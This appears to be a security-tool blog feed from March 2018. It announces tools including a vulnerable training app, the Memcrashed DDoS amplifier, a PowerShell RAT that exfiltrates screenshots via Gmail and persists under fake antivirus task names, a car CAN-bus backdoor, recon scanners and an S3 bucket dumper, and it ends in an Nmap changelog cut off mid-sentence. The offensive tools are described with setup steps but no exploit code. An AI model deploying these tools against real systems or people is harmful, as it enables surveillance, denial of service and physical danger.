XVNA - Extreme Vulnerable Node Application

March 14, 2018, 2:12 pm

≫ Next: Memcrashed-DDoS-Exploit - DDoS Attack Tool For Sending Forged UDP Packets To Vulnerable Memcached Servers Obtained Using Shodan API

≪ Previous: JoomScan 0.0.5 - OWASP Joomla Vulnerability Scanner Project

XVNA is an extreme vulnerable node application coded in Nodejs(Expressjs)/MongoDB that helps security enthusiasts to learn application security. it's not counseled to host this application online as it is intended to be Vulnerable. We tend to suggest hosting this application in native setting and sharpening your application security skills with any tools of your own selection. It’s all legal to interrupt or hack into this. the concept is to evangelize application security to the community in probably the best and elementary method. Learn and acquire these skills permanently purpose. however you utilize these skills and content isn't our responsibility.

Warning

Extreme Vulnerable Node Application (XVNA) is most vulnerable, don't transfer it to your hosting provider's public folder or any net facing servers, as they'll be compromised. It is recommended to use localhost.

Disclaimer

We are not resposible for any loss after using this XVNA (Extreme Vulnerable Node Application). We are clearing that this is malicious application , we are not responsible for any loss of yours. Installing it in web server may compromise your security and data.

Setup

Start mongoDB
Create DB xvna in mongoDB
Import the Collection to mongoDB given from folder collection
Start the xvna from root folder using command: node index.js
We are good to go , hit localhost:3000/app
Login Credential: email-> admin@xvna.com password -> password

List of Vulnerability

A1:2017-Injection

OS Injection
NOSql Injection
Server side Js Injection

A2:2017-Broken Authentication
A3:2017-Sensitive Data Exposure

Sensitive Data
Headers

A6:2017-Security Misconfiguration
A7:2017-Cross Site Scripting
A8:2017-Insecure Deserialization

More https://www.vegabird.com/category/extreme-vulnerable-node-application/

Download XVNA

↧

Memcrashed-DDoS-Exploit - DDoS Attack Tool For Sending Forged UDP Packets To Vulnerable Memcached Servers Obtained Using Shodan API

March 15, 2018, 5:49 am

≫ Next: Firefox Tunnel - The Way To Use Firefox To Make A Tunnel To Remote Communication

≪ Previous: XVNA - Extreme Vulnerable Node Application

This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io

Prerequisites
The only thing you need installed is Python 3.x

apt-get install python3

You also require to have Scapy and Shodan modules installed

pip install scapy
pip install shodan

Using Shodan API
This tool requires you to own an upgraded Shodan API
You may obtain one for free in Shodan if you sign up using a .edu email

Using Docker

You may deploy this tool to the cloud using a light Alpine Docker image.

Note: Make sure to explicitly enter 'y' or 'n' to the interactive prompt

git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
cd Memcrashed-DDoS-Exploit
echo "SHODAN_KEY" > api.txt
docker build -t memcrashed .
docker run -it memcrashed

Download Memcrashed-DDoS-Exploit

↧

Firefox Tunnel - The Way To Use Firefox To Make A Tunnel To Remote Communication

March 15, 2018, 1:23 pm

≫ Next: Powershell-RAT - Python Based Backdoor That Uses Gmail To Exfiltrate Data Through Attachment

≪ Previous: Memcrashed-DDoS-Exploit - DDoS Attack Tool For Sending Forged UDP Packets To Vulnerable Memcached Servers Obtained Using Shodan API

The way to use firefox to make a tunnel to remote communication. For I/O of payloads uses cookie.sqlite and html with javascript to auto submit, the browser runs in hidden mode.

Read the docs:
firefox_tunnel_paper.pdf

Step by step to run the PoC:
Beamer_Keynote_looking_style.pdf

Demo:

More info: https://medium.com/code-fighters/firefox-tunnel-to-bypass-any-firewall-bc6f8b432980

Download Firefox Tunnel

↧

Powershell-RAT - Python Based Backdoor That Uses Gmail To Exfiltrate Data Through Attachment

March 16, 2018, 5:27 am

≫ Next: DefenseMatrix - Full security solution for Linux Servers

≪ Previous: Firefox Tunnel - The Way To Use Firefox To Make A Tunnel To Remote Communication

Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment.

This RAT will help someone during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.

Note: This piece of code is Fully UnDetectable (FUD) by Anti-Virus (AV) software.

This project must not be used for illegal purposes or for hacking into system where you do not have permission, it is strictly for educational purposes and for people to experiment with.

Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral

Screenshots

On the first run of the Powershell-RAT user will get options as below:

Using Hail Mary option to backdoor a Windows machine:

Successfully taking screenshots of the user activity:

Data exfiltrated as an email attachment using Gmail:

My Windows machine do not have Python installed, what should I do?

Compile PowershellRAT.py into an executable using Pyinstaller
PyInstaller is available on PyPI. You can install it through pip:

pip install pyinstaller

Setup

Throwaway Gmail email address
Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps
Modify the $username& $password variable for your account in the Mail.ps1 Powershell file
Modify $msg.From& $msg.To.Add with throwaway gmail address

How do I use this?

Press 1: This option sets the execution policy to unrestricted using Set-ExecutionPolicy Unrestricted. This is useful on administrator machine
Press 2: This takes the screenshot of the current screen on the user machine using Shoot.ps1 Powershell script
Press 3: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesCore
Press 4: This option sends an email from the user machine using Powershell. These uses Mail.ps1 file to send screenshot as attachment to exfiltrate data
Press 5: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesUA
Press 6: This option deletes the screenshots from user machine to remain stealthy
Press 7: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesDF
Press 8: This option performs all of the above with a single button press 8 on a keyboard. Attacker will receive an email every 5 minutes with screenshots as an email attachment. Screenshots will be deleted after 12 minutes
Press 9: Exit gracefully from the program or press Control+C

Questions?
Twitter: https://twitter.com/maniarviral LinkedIn: https://au.linkedin.com/in/viralmaniar

Download Powershell-RAT

↧

DefenseMatrix - Full security solution for Linux Servers

March 16, 2018, 1:40 pm

≫ Next: Th3Inspector - Tool for Information Gathering

≪ Previous: Powershell-RAT - Python Based Backdoor That Uses Gmail To Exfiltrate Data Through Attachment

Full security solution for Linux Servers.

SCUTUM is to be added into DefenseMatrix Project
After consideration, SCUTUM, as a nice firewall controller, is to be added into DefenseMatrix. It will soon replace the iptables controller and arptables controller in DefenseMatrix. Expect lots of improvements.

What is DefenseMatrix?
DefenseMatrix helps individuals and organizations who use Linux to secure their servers on various dimentions automatically. It makes securing a Linux server faster and easier.
Never before have a program been able to have so many security features packed in one. Therefore we provide you with this all-in-one solution that will make the following difficult things easier to handle.

Why do we need to secure Linux?
Did you know that an ordinary server receives almost 6000 attacks per day? With our help, these attacks don't come in.

DefenseMatrix features:

iptables tcp/udp/icmp firewall
arptables ARP firewall
Rootkit Detection
Password complexity check
Attack analysis and visualization

We configure these things automatically for you.

Installation
We make it fast, easy, and simple

$ sudo sh -c "$(curl -fsSL https://raw.githubusercontent.com/K4YT3X/DefenseMatrix/master/quickinstall.sh)"

Uninstallation
We still make it easy for you

$ sudo DefenseMatrix --uninstall

Usage
This is how you get started with DefenseMatrix

$ sudo DefenseMatrix                  # Print Help Page
$ sudo service DefenseMatrix start    # Start DefenseMatrix service
$ sudo service DefenseMatrix stop     # Stop DefenseMatrix service

Download DefenseMatrix

↧

Th3Inspector - Tool for Information Gathering

March 17, 2018, 5:15 am

≫ Next: CBM - Car Backdoor Maker

≪ Previous: DefenseMatrix - Full security solution for Linux Servers

Tool For Information Gathering.

Usage

Short Form	Long Form	Description
-i	--info	Website Information
-n	--number	Phone Number Information
-mx	--mailserver	Find IP Address And E-mail Server
-w	--whois	Domain Whois Lookup
-l	--location	Find Website/IP Address Location
-c	--cloudflare	Bypass CloudFlare
-a	--age	Domain Age Checker
-ua	--useragent	User Agent Info
-p	--port	Check Active Services On Resource
-b	--bin	Credit Card Bin Checker
-s	--subdomain	Subdomain Scanner
-e	--email	E-mail Address Checker
-cms	--cms	Content Management System Checker
-h	--help	show the help message and exit

Examples

To list all the basic options and switches use -h switch:

perl Th3inspector.pl -h

To Get Website Information:

perl Th3inspector.pl -i example.com

To Get Phone Number Information :

perl Th3inspector.pl -n xxxxxxx

To Find IP Address And E-mail Server:

perl Th3inspector.pl -mx example.com

To Find Website Or IP Address Location :

perl Th3inspector.pl -l example.com

To Get Real IP Of Website Using CloudFlare Protection

perl Th3inspector.pl -c example.com

Screenshots

Video

Installation Linux

git clone https://github.com/Moham3dRiahi/Th3inspector.git
cd Th3inspector
chmod +x install.sh && ./install.sh

Installation Android
Download Termux

git clone https://github.com/Moham3dRiahi/Th3inspector.git
cd Th3inspector
chmod +x install.sh && ./install.sh

Installation Windows

Download Perl
Download Th3inspector
cpan install JSON
Extract Th3inspector into Desktop
Open CMD and type the following commands:
cd Desktop/Th3inspector-master/
perl Th3inspector.pl

Version
Current version is 1.9What's New
• speed up
• Bug fixes

Download Th3inspector

↧

CBM - Car Backdoor Maker

March 17, 2018, 1:09 pm

≫ Next: StaCoAn - Crossplatform tool which aids developers, bugbounty hunters and ethical hackers performing static code analysis on mobile applications

≪ Previous: Th3Inspector - Tool for Information Gathering

A hardware-backdoor for CAN bus - by @UnaPibaGeek & @holesec

For the first time, a hardware backdoor tool is presented having several advanced features, such as: remote control via SMS commands, automated launch of attack payloads at a GPS location or when a specific car status is reached; and a configuration interface that allows users to create attack payloads in an easy manner. Have you ever imagined the possibility of your car being automatically attacked based on its GPS coordinates, its current speed or any other set of parameters? Now it's possible :-)

The project is divided in two parts: the "Car Backdoor Maker" (PC software) and "The Bicho" (hardware-backdoor for CAN bus).

Car Backdoor Maker

The "car backdoor maker" is a PC software that allows payload customization for using with the hardware-backdoor. It has an intuitive graphical interface:

Under "car backdoor maker" folder, you'll find the source code to compile it using Qt C++ 5.6.

The Bicho

The Bicho is a hardware-backdoor that must be connected to the car's OBD-II port. It supports multiple attack payloads (pre-configured using Car Backdoor Maker) and it can be used against any vehicle that supports CAN, without limitations regarding manufacturer or model. Each one of the payloads is associated to a command that can be delivered via SMS, allowing remote execution from any geographical point. Furthermore, as an advanced feature, the attack payload can be configured to be automatically executed once the victim's vehicle is proximate to a given GPS location. The execution can also be triggered by detecting the transmission of a particular CAN frame, which can be associated with the speed of the vehicle, its fuel level, and some other factors, providing the means to design highly sophisticated attacks and execute them remotely.

Under "hardware-schematics" and "firmware" folders you'll find all you need to build our hardware-backdoor in your own lab.

Download CBM

↧

StaCoAn - Crossplatform tool which aids developers, bugbounty hunters and ethical hackers performing static code analysis on mobile applications

March 18, 2018, 5:39 am

≫ Next: Taipan - Web Application Security Scanner

≪ Previous: CBM - Car Backdoor Maker

StaCoAn is a crossplatform tool which aids developers, bugbounty hunters and ethical hackers performing static code analysis on mobile applications*.

This tool will look for interesting lines in the code which can contain:

Hardcoded credentials
API keys
URL's of API's
Decryption keys
Major coding mistakes

This tool was created with a big focus on usability and graphical guidance in the user interface.

For the impatient ones, grab the download on the releases page.

*: note that currently only apk files are supported, but ipa files will follow very shortly.

An example report can be found here: example report

Features

The concept is that you drag and drop your mobile application file (an .apk or .ipa file) on the StaCoAn application and it will generate a visual and portable report for you. You can tweak the settings and wordlists to get a customized experience.

The reports contain a handy tree viewer so you can easily browse trough your decompiled application.

Looting concept
The Loot Function let you 'loot' (~bookmark) the findings which are of value for you and on the loot-page you will get an overview of your 'loot' raid.
The final report can be exported to a zip file and shared with other people.

Wordlists
The application uses wordlists for finding interesting lines in the code. Wordlists are in the following format:

API_KEY|||80||| This contains an API key reference
(https|http):\/\/.*api.*|||60||| This regex matches any URL containing 'api'

Note that these wordlists also support regex entries.

Filetypes
Any source file will be processed. This contains '.java', '.js', '.html', '.xml',... files.
Database-files are also searched for keywords. The database also has a table viewer.

Responsive Design
The reports are made to fit on all screens.

Limitations
This tool will have trouble with obfuscated code. If you are a developer try to compile without obfuscation turned on before running this tool. If you are on the offensive side, good luck bro.

Getting Started
If you want to get started as soon as possible, head over to the releases page and download the executable or archive which corresponds to your operating system.
If you have downloaded the release zip file, extract this. Copy the .apk or .ipa file to the extracted folder.
Drag and drop this file onto the executable. The report will now be generated in the report folder.

From source

git clone https://github.com/vincentcox/StaCoAn/
cd StaCoAn/src

Make sure that you have pip3 installed:

sudo apt-get install python3-pip

Install the required python packages:

pip3 install -r requirements.txt

Run StaCoAn:

python3 stacoan.py yourApp.apk

Building the executable

pip3 install pyinstaller

Windows

pyinstaller main.py --onefile --icon icon.ico --name stacoan --clean

mac

pyinstaller main.py --onefile --icon icon.ico --name stacoan --clean

Linux

python3 -m PyInstaller main.py --onefile --icon icon.ico --name stacoan --clean

Running the Docker container

cd docker
docker build . -t stacoan
docker run -e JAVA_OPTS="-Xms2048m -Xmx2048m" -p 8000:8000 -v /yourappsfolder:/tmp -i -t stacoan /tmp/com.myapk.apk

Wait for it to be analysed and the open your browser in http://localhost:8000

Download StaCoAn

↧

Taipan - Web Application Security Scanner

March 18, 2018, 2:25 pm

≫ Next: GetAltName - Get Subject Alt Name From SSL Certificates

≪ Previous: StaCoAn - Crossplatform tool which aids developers, bugbounty hunters and ethical hackers performing static code analysis on mobile applications

Taipan is a an automated web application scanner which allows to identify web vulnerabilities in an automatic fashion. This project is the core engine of a broader project which include other components, like a web dashboard where you can manage your scan or download a PDF report and a scanner agent to run on specific host. Below are some screenshots of the Taipan dashboard:

If you are interested in trying the full product, you can contact: aparata[AT]gmail.com
Download

Using Taipan
Taipan can run on both Windows (natively) and Linux (with mono). To run it in Linux you have to install mono in version >= 4.8.0. You can track the implementation of the new features in the related Kanban board.

Scan Profile
Taipan allow to scan the given web site by specify different kind of profiles. Each profile enable or disable a specific scan feature, to show all the available profile just run Taipan with the --show-profiles option.

Scan/Stop/Pause a scan
During a scan you can interact with it by set the scan in Pause or Stop it if necessary. In order to do so you have to press:

P: pause the scan
S: stop the scan
R: resume a paused scan

The state change is not immediate and you have to wait until all threads have reached the desider state.

Launch a scan
To launch a new scan you have to provide the url and the profile which must be used. It is not necessary to specify the full profile name, a prefix is enough. Below an example of execution:

Taipan Components
Taipan is composed of four main components:

Web Application fingerprinter: it inspects the given application in order to identify if it is a COTS application. If so, it extracts the identified version.
Hidden Resource Discovery: this component scans the application in order to identify resources that are not directly navigable or that shouldn't be accessed, like secret pages or test pages.
Crawler: This component navigates the web site in order to provide to the other components a list of pages to analyze. It allows to mutate the request in order to find not so common pathes.
Vulnerability Scanner: this component probes the web application and tries to identify possible vulnerabilities. It is composed of various AddOn in order to easily expand its Knowledge Base.

Download Taipan

↧

GetAltName - Get Subject Alt Name From SSL Certificates

March 19, 2018, 6:00 am

≫ Next: Converto - Installing Kali Linux On VPS Server

≪ Previous: Taipan - Web Application Security Scanner

GetAltName it's a little script that can extract Subject Alt Names for SSL Certificates directly from HTTPS web sites which can provide you with DNS names or virtual servers.

It's useful in a discovery phase of a pen-testing assessment, this tool can provide you with more information about your target and scope.

This code is in alpha stage and has been rewritten from Ruby to Python, it doesn't do as much as it should. lots of things and features are missing, but it delivers, treat it as a quick-dirty-code. More features incoming, also you're welcome to contribute if you want.

You can read more about how this tool works from my post in getroot.info (in Spanish).

Usage:

usage: getaltname.py [-h] [-p PORT] [-s [timeout]] [-m] [-o OUTPUT] [-c {l,s}]
                     [-d]
                     hostname

positional arguments:
  hostname                              Host to analyze.

optional arguments:
  -h, --help                            show this help message and exit
  -p PORT, --port PORT                  Destiny port (default 443)
  -s [timeout], --search-crt [timeout]  Retrieve subdomains found in crt.sh
  -m, --matching-domain                 Show matching domain name only
  -o OUTPUT, --output OUTPUT            Set output filename
  -c {l,s}, --clipboard {l,s}           Copy the output to the clipboard as a
                                        List or a Single string
  -d, --debug                           Set debug enable

You can output to a text file and also copy the output to you clipboard as a List or a Single line string, which is useful if you're trying to make a quick scan with Nmap or other tools.

Installation
Required libraries:

colorama
ndg-httpsclient
pyperclip
requests
tldextract

Installation with pipenv:

$ git clone https://github.com/franccesco/getaltname.git
$ pipenv install

Installation with Pip:

$ git clone https://github.com/franccesco/getaltname.git
$ pip install -r requirements.txt

For the copy&paste mechanism you will have to install xclip package. Debian/Ubuntu/Mint:

$ apt install xclip

TO-DO

File output
Output to clipboard
Clean sub-domains wildcards
Remove duplicates
A filter system for main domain and TLD's.
Add colors (so l33t. /s)
Get additional sub-domains from crt.sh

Download GetAltName

↧

Converto - Installing Kali Linux On VPS Server

March 19, 2018, 2:09 pm

≫ Next: S3Scanner - Scan For Open S3 Buckets And Dump

≪ Previous: GetAltName - Get Subject Alt Name From SSL Certificates

Installing Kali Linux On VPS Server.

Steps For Installing :-
1.sudo apt-get update
2.sudo apt-get install git
3.git clone https://github.com/developerkunal/Converto.git
4.cd Converto.
5.chmod +x converto.sh

./converto.sh

Type 1 For Install Type 2 For Exit
Press 1 and Enter

Now choose the desired option.

Press Y .

Now Select Yes.

Now Select install the package maintainer's version And Press Enter.

Now again Select install the package maintainer's version And Press Enter.

Now Choose the appropriate Metapackages you want to install .

    1. Kali Linux base system
    2. Kali Linux - all packages
    3. Kali Linux forensic tools
    4. Kali Linux complete system
    5. Kali Linux GPU tools
    6. Kali Linux Nethunter tools
    7. Kali Linux password cracking tools
    8. Kali Linux RFID tools
    9. Kali Linux SDR tools
    10. Kali Linux Top 10 tools
    11. Kali Linux VoIP tools
    12. Kali Linux webapp assessment tools
    13. Kali Linux wireless tools

Select option 2 (Kali Linux - all packages install) (Recommended).

Select Language for the layout matching the keyboard (i am Selecting English.)

Select No.

Select Yes.

Press Right Arrow Key, and Press Enter .

Select Yes.

Press Enter If Not Want to add any Users.

Select From inetd.
Press Enter.

Now Kali Linux is Successfully Installed.

Optional Step for installing VNC.

Steps :-

Choose You VNC Type you want to install (Graphical VNC Recommended)

Now Enter The Password for the VNC Connection and also re-enter the password for verification.

Optional : Press Y if you want a view only password (In view only password, The one having the password will only have the permission to view the screen.)

Commands to Start and Stop The VNC Server

TO start a VNC Server
root@kali:~# vncserver
(It always start on Port 1)

To stop a VNC Server
root@kali:~# vncserver -kill :1
Example IP in VNC Viewer : 127.0.0.1:1

Download Converto

↧

S3Scanner - Scan For Open S3 Buckets And Dump

March 20, 2018, 6:10 am

≫ Next: WPHunter - Wordpress Vulnerability Scanner

≪ Previous: Converto - Installing Kali Linux On VPS Server

A quick and dirty script to find unsecured S3 buckets and dump their contents.

Using
The tool has 2 parts:

1 - s3finder.py
This script takes a list of domain names and checks if they're hosted on Amazon S3. Found S3 domains are output to file with their corresponding region in format "domain:region".

Install:
1. (Optional) virtualenv venv && source ./venv/bin/activate
2. pip install -r requirements.txt
Usage:$> python s3finder.py -o output.txt domainsToCheck.txt

Compatibility: Tested with Python 2.7 & 3.6

2 - s3dumper.sh
This script takes in a list of domains with regions made by s3finder.py. For each domain, it checks if there are publicly readable buckets and dumps them if so.
Usage:$> s3dumper.sh output.txt
Requirements:aws-cli

Download S3Scanner

↧

WPHunter - Wordpress Vulnerability Scanner

March 20, 2018, 2:18 pm

≫ Next: Nmap 7.70 - Free Security Scanner: Better service and OS detection, 9 new NSE scripts, new Npcap, and much more

≪ Previous: S3Scanner - Scan For Open S3 Buckets And Dump

You can use this tool on your wordpress website to check the security of your website by finding the vulnerability in your website.

Over 75 million websites run on WordPress. which is now powers 26% of the Web. Remarkably enough thousands of WP sites are vulnerable to attacks and get hacked each day. You can lose all your data, it can cost thousands of dollars, or worse, attackers might use your WordPress to target your visitors. Bots scan the web automatically for weak websites and hack into them within seconds. If your WordPress is vulnerable, it will be only a matter of time before you run into trouble. That's why you should get started as soon as possible and check if your WordPress is prone to attack.

[+] Auto Cms Detect
[1] WordPress :

The tool detects the wordpress version and try to find the vulnerabilities that are vulnerable on the version,the tools detects also the the plugins and themes installed on the website.

WPHunter can aslo find the backup files, path disclosure, and checks security headers.

Usage

Short Form	Long Form	Description
-h	--help	usage of the tool

Example
if you have list websites run tool with this command line
if you don't have list websites run the tool with this command

php wphunter.php https://www.example.com

Installation Linux

git clone https://github.com/Jamalc0m/wphunter/wphunter.git
cd WPHunter
php wphunter.php

Installation Windows

Download  and install PHP
Download WPHunter
Extract WPHunter into Desktop
Open CMD and type the following commands:
cd Desktop/wphunter-master/
php wphunter.php

Version
Current version is 0.1 BetaUpComing features:
Scan for plugins and theme vulnerabilities, generate reports (PDF,HTML), Passowrd Brute Force.

Download Wphunter

↧

Nmap 7.70 - Free Security Scanner: Better service and OS detection, 9 new NSE scripts, new Npcap, and much more

March 21, 2018, 5:25 am

≫ Next: WPSeku v0.4 - Wordpress Security Scanner

≪ Previous: WPHunter - Wordpress Vulnerability Scanner

Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in twelve movies, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.

Features

Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.

Changelog

Here is the full list of significant changes:

• [Windows] We made a ton of improvements to our Npcap Windows packet
capturing library (https://nmap.org/npcap/) for greater performance and
stability, as well as smoother installer and better 802.11 raw frame
capturing support. Nmap 7.70 updates the bundled Npcap from version 0.93 to
0.99-r2, including all these changes from the last seven Npcap releases:
https://nmap.org/npcap/changelog

• Integrated all of your service/version detection fingerprints submitted
from March 2017 to August 2017 (728 of them). The signature count went up
1.02% to 11,672, including 26 new softmatches.  We now detect 1224
protocols from filenet-pch, lscp, and netassistant to sharp-remote,
urbackup, and watchguard.  We will try to integrate the remaining
submissions in the next release.

• Integrated all of your IPv4 OS fingerprint submissions from September
2016 to August 2017 (667 of them). Added 298 fingerprints, bringing the new
total to 5,652. Additions include iOS 11, macOS Sierra, Linux 4.14, Android
7, and more.

• Integrated all 33 of your IPv6 OS fingerprint submissions from September
2016 to August 2017. New groups for OpenBSD 6.0 and FreeBSD 11.0 were
added, as well as strengthened groups for Linux and OS X.

• Added the --resolve-all option to resolve and scan all IP addresses of a
host.  This essentially replaces the resolveall NSE script. [Daniel Miller]

• [NSE][SECURITY] Nmap developer nnposter found a security flaw (directory
traversal vulnerability) in the way the non-default http-fetch script
sanitized URLs. If a user manualy ran this NSE script against a malicious
web server, the server could potentially (depending on NSE arguments used)
cause files to be saved outside the intended destination directory.
Existing files couldn't be overwritten.  We fixed http-fetch, audited our
other scripts to ensure they didn't make this mistake, and updated the
httpspider library API to protect against this by default. [nnposter,
Daniel Miller]

• [NSE] Added 9 NSE scripts, from 8 authors, bringing the total up to 588!
They are all listed at https://nmap.org/nsedoc/, and the summaries are
below:

   - deluge-rpc-brute performs brute-force credential testing against
   Deluge BitTorrent RPC services, using the new zlib library. [Claudiu Perta]
   - hostmap-crtsh lists subdomains by querying Google's Certificate
   Transparency logs. [Paulino Calderon]
   - [GH#892] http-bigip-cookie decodes unencrypted F5 BIG-IP cookies and
   reports back the IP address and port of the actual server behind the
   load-balancer. [Seth Jackson]
   - http-jsonp-detection Attempts to discover JSONP endpoints in web
   servers. JSONP endpoints can be used to bypass Same-origin Policy
   restrictions in web browsers. [Vinamra Bhatia]
   - http-trane-info obtains information from Trane Tracer SC controllers
   and connected HVAC devices. [Pedro Joaquin]
   - [GH#609] nbd-info uses the new nbd.lua library to query Network Block
   Devices for protocol and file export information. [Mak Kolybabi]
   - rsa-vuln-roca checks for RSA keys generated by Infineon TPMs
   vulnerable to Return Of Coppersmith Attack (ROCA) (CVE-2017-15361). Checks
   SSH and TLS services. [Daniel Miller]
   - [GH#987] smb-enum-services retrieves the list of services running on a
   remote Windows machine. Modern Windows systems requires a privileged domain
   account in order to list the services. [Rewanth Cool]
   - tls-alpn checks TLS servers for Application Layer Protocol Negotiation
   (ALPN) support and reports supported protocols. ALPN largely replaces NPN,
   which tls-nextprotoneg was written for. [Daniel Miller]

• [GH#978] Fixed Nsock on Windows giving errors when selecting on STDIN.
This was causing Ncat 7.60 in connect mode to quit with error: libnsock
select_loop(): nsock_loop error 10038: An operation was attempted on
something that is not a socket.  [nnposter]

• [Ncat][GH#197][GH#1049] Fix --ssl connections from dropping on
renegotiation, the same issue that was partially fixed for server mode in
[GH#773]. Reported on Windows with -e by pkreuzt and vinod272. [Daniel
Miller]

• [NSE][GH#1062][GH#1149] Some changes to brute.lua to better handle
misbehaving or rate-limiting services. Most significantly,
brute.killstagnated now defaults to true. Thanks to xp3s and Adamtimtim for
reporing infinite loops and proposing changes.

• [NSE] VNC scripts now support Apple Remote Desktop authentication (auth
type 30) [Daniel Miller]

• [NSE][GH#1111] Fix a script crash in ftp.lua when PASV connection timed
out. [Aniket Pandey]

• [NSE][GH#1114] Update bitcoin-getaddr to receive more than one response
message, since the first message usually only has one address in it. [h43z]

• [Ncat][GH#1139] Ncat now selects the correct default port for a given
proxy type. [Pavel Zhukov]

• [NSE] memcached-info can now gather information from the UDP memcached
service in addition to the TCP service. The UDP service is frequently used
as a DDoS reflector and amplifier. [Daniel Miller]

• [NSE][GH#1129] Changed url.absolute() behavior with respect to dot and
dot-dot path segments to comply with RFC 3986, section 5.2. [nnposter]

• Removed deprecated and undocumented aliases for several long options that
used underscores instead of hyphens, such as --max_retries. [Daniel Miller]

• Improved service scan's treatment of soft matches in two ways. First of
all, any probes that could result in a full match with the soft matched
service will now be sent, regardless of rarity.  This improves the chances
of matching unusual services on non-standard ports.  Second, probes are now
skipped if they don't contain any signatures for the soft matched service.
Perviously the probes would still be run as long as the target port number
matched the probe's specification.  Together, these changes should make
service/version detection faster and more accurate.  For more details on
how it works, see https://nmap.org/book/vscan.html. [Daniel Miller]

• --version-all now turns off the soft match optimization, ensuring that
all probes really are sent, even if there aren't any existing match lines
for the softmatched service. This is slower, but gives the most
comprehensive results and produces better fingerprints for submission.
[Daniel Miller]

• [NSE][GH#1083] New set of Telnet softmatches for version detection based
on Telnet DO/DON'T options offered, covering a wide variety of devices and
operating systems. [D Roberson]

• [GH#1112] Resolved crash opportunities caused by unexpected libpcap
version string format. [Gisle Vanem, nnposter]

• [NSE][GH#1090] Fix false positives in rexec-brute by checking responses
for indications of login failure. [Daniel Miller]

• [NSE][GH#1099] Fix http-fetch to keep downloaded files in separate
destination directories. [Aniket Pandey]

• [NSE] Added new fingerprints to http-default-accounts:
+ Hikvision DS-XXX Network Camera and NUOO DVR [Paulino Calderon]
+ [GH#1074] ActiveMQ, Purestorage, and Axis Network Cameras [Rob
Fitzpatrick, Paulino Calderon]

• Added a new service detection match for WatchGuard Authentication
Gateway. [Paulino Calderon]

• [NSE][GH#1038][GH#1037] Script qscan was not observing interpacket delays
(parameter qscan.delay). [nnposter]

• [NSE][GH#1046] Script http-headers now fails properly if the target does
not return a valid HTTP response. [spacewander]

• [Ncat][Nsock][GH#972] Remove RC4 from the list of TLS ciphers used by
default, in accordance with RFC 7465. [Codarren Velvindron]

• [NSE][GH#1022] Fix a false positive condition in ipmi-cipher-zero caused
by not checking the error code in responses. Implementations which return
an error are not vulnerable. [Juho Jokelainen]

• [NSE][GH#958] Two new libraries for NSE.

   - idna - Support for internationalized domain names in applications
   (IDNA)
   - punycode (a transfer encoding syntax used in IDNA) [Rewanth Cool]

• [NSE] New fingerprints for http-enum:

   - [GH#954] Telerik UI CVE-2017-9248 [Harrison Neal]
   - [GH#767] Many WordPress version detections [Rewanth Cool]

• [GH#981][GH#984][GH#996][GH#975] Fixed Ncat proxy authentication issues
[nnposter]:

   - Usernames and/or passwords could not be empty
   - Passwords could not contain colons
   - SOCKS5 authentication was not properly documented
   - SOCKS5 authentication had a memory leak

• [GH#1009][GH#1013] Fixes to autoconf header files to allow autoreconf to
be run. [Lukas Schwaighofer]

• [GH#977] Improved DNS service version detection coverage and consistency
by using data from a Project Sonar Internet wide survey. Numerouse false
positives were removed and reliable softmatches added. Match lines for
version.bind responses were also conslidated using the technique below.
[Tom Sellers]

• [GH#977] Changed version probe fallbacks so as to work cross protocol
(TCP/UDP). This enables consolidating match lines for services where the
responses on TCP and UDP are similar. [Tom Sellers]

• [NSE][GH#532] Added the zlib library for NSE so scripts can easily handle
